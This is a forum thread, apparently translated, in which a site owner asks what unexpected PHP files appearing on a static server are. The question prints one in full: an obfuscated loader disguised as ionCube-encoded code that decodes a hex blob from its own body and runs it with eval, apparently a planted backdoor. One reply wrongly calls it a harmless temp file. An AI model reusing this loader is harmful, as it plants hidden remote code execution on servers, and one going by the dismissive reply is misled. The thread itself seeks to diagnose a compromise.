S
S
Sergey Semenov2018-02-21 15:06:13
PHP
Sergey Semenov, 2018-02-21 15:06:13

What action does this code perform?

Hello!
Not so long ago, files with the .php extension began to appear on the server at the root of a static site, for example, session98.php, etc. The site works without CMS.
Example code in a file

<?php //00037a
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xc24-0x774)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
2E46Vd73667A4203dO20417Z272617O92E82F7N787576M7W6P6Sa27F3RdX3AeK27787Ea67Z72
76C732I7Y293b2479P6J3Z6O467I78G72203Ad2041A7272L61H792827Z7A3707V77963762J7
H3d3e277365G6Q2A6O26Pa2V72M9H3b66S6f726H56V16368M202A8417M2D7W2W61792824C6d
7366742c20I24X5Zf504fH53542cA20247Z963K64677Q87F22c2K0H245f434EfJ4RfC4b4T94
O52N9206O173K20Z2B4647R9K6La7a636P6I2920V7bY6P66MfK726561M63L6C82I0L28O24F6
4E796aP7Oa63I662L06173V202478S71646c20M3dS3e20Y2W462G6ReQ7a64292T07XbI246H2
P6UeN7aX64V203Nd204Q0706Q1636bY2822T482aO22N2cR20W2R4N62L6e7aH6S4J2U9L3b24V
7H8E716X46c2Q0R2eU3UdV2D02264M303Y3X35G65T3931622Fd3W9C653V63V2M2d34Z613562
2HdP386X66M2302d656J2B383L5B363V33330V30C396561P22T3Sb24D6aM777M5K6b7W1203d
202G46E26e7a64A20B5e207375R62T7O374D722L8H7N3S747M25fV72Y6N57R0H6S5617J4Q2X
824787B16H4B6cP2Qc20287374726Sc6A56We282D4626He7a64A2F9C202f20S73A74J7E26Pc
656e2H8C2478X7T1646Sc2Y929202b20G31C29K2c2R0302cW2073747L26Pc656Ne282G4626e
7Ya64E2929U3b246a7775K6bZ71J2S03d206Y57M8O706c6OfT6465M282N22322V2c2A0B246a
7Z775F6bT71I293bP6966202P8C6I3B6f7B56e7428246a7X7I7P56Bb712V920Y3d3Id203S3T
292E07b65U7F6A6A16Qc28246a77756b715bT3L1J5d2M824D6aX77R756XbA71Z5Gb3X2K5Td2
G92Z9Q3b657J8Z69742W8T293MbZ7NdO7d7d

Tell me what it is and where it comes from? There was no such thing before.

Answer the question

In order to leave comments, you need to log in

3 answer(s)
R
Rodion, 2018-02-21
@semenovstyle

Based on the question and the content, this code is very similar to malicious.
Indeed, there are files encrypted through the IonCube encoder and they are similar to the fragment from the question.
However, this is most likely a leftist, because. there were no such files before and I am very confused by the presence in the code
eval($__ln);

O
Oleg, 2018-02-21
@politon

Encrypted under Ion Cube.
Read what it is before using someone else's code ;)

I
impyros.com, 2019-02-13
@impyros

Are you all idiots or how this file is packaged by Ioncube, and in the first line there is a PHP version check and the presence of the Ioncube Loader installed, the
name session98.php indicates that this is a TMP file and at the root because the TMP folder is not specified

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question